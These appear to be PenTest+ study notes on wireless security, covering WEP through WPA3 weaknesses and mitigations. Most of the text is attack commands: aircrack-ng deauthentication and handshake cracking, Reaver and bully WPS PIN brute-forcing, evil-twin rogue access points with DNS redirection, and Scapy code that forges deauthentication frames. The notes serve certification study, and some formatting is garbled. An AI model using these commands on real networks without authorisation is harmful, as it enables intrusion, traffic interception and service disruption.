Wireless Security
Encryption Types
- WEP (Wired Equivalent Privacy): RC4 cipher with 40‑ or 128‑bit key; weak 24‑bit IV → trivial to crack
- WPA (Wi‑Fi Protected Access): TKIP + RC4 + MIC; fixes WEP IV but still TKIP vulnerabilities → upgrade to WPA2
- WPA2: AES‑CCMP; supports Personal (PSK) & Enterprise (RADIUS) modes; strong but PK dictionary attacks possible
- WPA3: SAE (Dragonfly) key exchange, forward secrecy, 192‑bit enterprise mode; currently no known practical attacks
Look into Diffie Hellman Key exchange protocol to understand how the WPA3’s SAE protocol is so secure
Common Vulnerabilities & Mitigations
- WEP: crack IVs via passive capture; mitigation: disable WEP, use WPA2/3
- WPA: vulnerable TKIP; mitigation: disable TKIP, use WPA2/3
- WPA2: PSK guessable; mitigation: strong passphrases or move to WPA3
- WPS: 8‑digit PIN brute‑force; mitigation: disable WPS
- MAC Filtering: trivial to bypass by MAC spoofing; mitigation: use encryption + 802.1X
Wireless Signal Exploitation
Signal Jamming
- Overwhelm channel with noise → disrupt comms; often illegal; avoid in production
Wardriving
- Map Wi‑Fi footprints by driving with scanning tools
- Tools:
- WiGLE.net: global Wi‑Fi map & analytics
- inSSIDer: real‑time scan (SSID, BSSID, channel, security)
- Ethical Use: only collect metadata, no unauthorized access
Aircrack‑ng Suite
Purpose: capture & crack WEP/WPA PSK handshakes
Deauthentication Attack
- Monitor mode:
airmon-ng start wlan0
2. **Scan**:
```bash
airodump-ng wlan0mon
```
3. **Capture** (target BSSID AA:BB:CC:DD:EE:FF on CH 6):
```bash
airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 --write capture wlan0mon
```
4. **Deauth** (send 10 frames):
```bash
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
```
5. **Crack PSK** (wordlist attack):
```bash
aircrack-ng -w /path/to/wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
```
---
## WPS PIN Attacks (Reaver)
````bash
# Start monitor mode
airmon-ng start wlan0
# Identify AP with WPS open
wash -i wlan0mon
# Brute‑force WPS PIN
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Find actual password with pin number
bully -b <mac> -p <pin> wlan0mon
Output: displays cracked PIN & WPA PSK once found
Captive Portal Attacks
Evil Twin + Rogue AP using hostapd & dnsmasq
# hostapd.conf snippet
driver=nl80211
interface=wlan0mon
essid=Free_WiFi
channel=6
# dnsmasq.conf snippet
interface=wlan0mon
dhcp-range=10.0.0.50,10.0.0.150,12h
address=/#/10.0.0.1- Redirect all DNS → captive portal on 10.0.0.1
Evil Twin Attack
# Create rogue AP
airbase-ng -e "Hotel_WiFi" -c 11 wlan0mon
wifipumpkin3 # Metasploitable style promptUse mitmproxy or SSLstrip to intercept HTTP(S) sessions.
Kismet
Passive discovery for Wi‑Fi, Bluetooth, Zigbee
# Start Kismet server
kismet -c wlan0mon --log-prefix=kismet-log --insecure- Detects hidden SSIDs during client handshakes
- Logs pcap for later analysis with Wireshark
Wi‑Fi Protocol Fuzzing
- Technique used to identify vulns in Wi-Fi by sending random or unexpected data and see how they respond
Scapy – craft malformed 802.11 & Wireshark
from scapy.all import *
deauth_frame = RadioTap() / \ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2="00:11:22:33:44:55", addr3="00:11:22:33:44:55") / \ Dot11Deauth(reason=99)
sendp(deauth_frame, iface="wlan0", count=10, inter=0.1)
beacon_frame = RadioTap() / \ 309 https://www.DionTraining.com CompTIA PenTest+ (PT0-003) (Study Guide) Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2="00:11:22:33:44:55", addr3="00:11:22:33:44:55") / \ Dot11Beacon(cap="ESS+privacy") / \ Dot11Elt(ID="SSID", info="Unexpected_SSID")
sendp(beacon_frame, iface="wlan0", count=10, inter=0.1)- Observe crashes or misbehavior → potential driver/firmware bug